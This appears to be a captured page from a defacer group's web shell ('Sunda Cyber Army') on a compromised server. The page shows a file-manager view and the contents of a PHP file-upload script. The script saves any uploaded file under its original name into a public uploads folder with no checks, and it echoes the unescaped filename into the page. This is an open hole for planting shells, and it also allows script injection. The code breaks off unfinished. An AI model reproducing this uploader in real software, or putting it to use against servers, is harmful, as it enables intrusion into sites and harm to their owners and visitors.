Sunda Cyber Army

* Sunda Cyber Army 2k17 *
Indonesia Defacer ~

Path : /home/dent/public_html/demoimages/
File Upload :
Current File : /home/dent/public_html/demoimages/upload.txt

echo "Form subission details:<br>" ;
echo "<hr>";

if(empty($_FILES["thefile"]["name"])) {
    //  either the form is loading for the first time
    // OR it was submitted with no file
    // stop page and give user message
    exit("error. no file.");
} else {
    // there is an uploaded file from
    // a form object named  "thefile
    echo  "Received a file in the form object 'thefile'.<br>";
    echo  "file was named <strong>" .
        $_FILES["thefile"]["name"] . "</strong>";

    echo  "file was first saved as a temp file at <strong>" .
        $_FILES["thefile"]["tmp_name"] .  "</strong><br>";
    echo  "file was then moved with a move_uploaded_file() command to server path <em><strong>" ;

    $path = $_SERVER['CONTEXT_DOCUMENT_ROOT'] . "/uploads/";

    echo  $path . "</strong></em><hr>";

    move_uploaded_file($_FILES["thefile"]["tmp_name"],  $path .  $_FILES["thefile"]["name"]);

    echo "<hr>";
    echo "Link to uploaded file: ";
    echo "<a href='/uploads/" . $_FILES['thefile']['name'] . "'>" .
        $_FILES["thefile"]["name"] . "</a>";
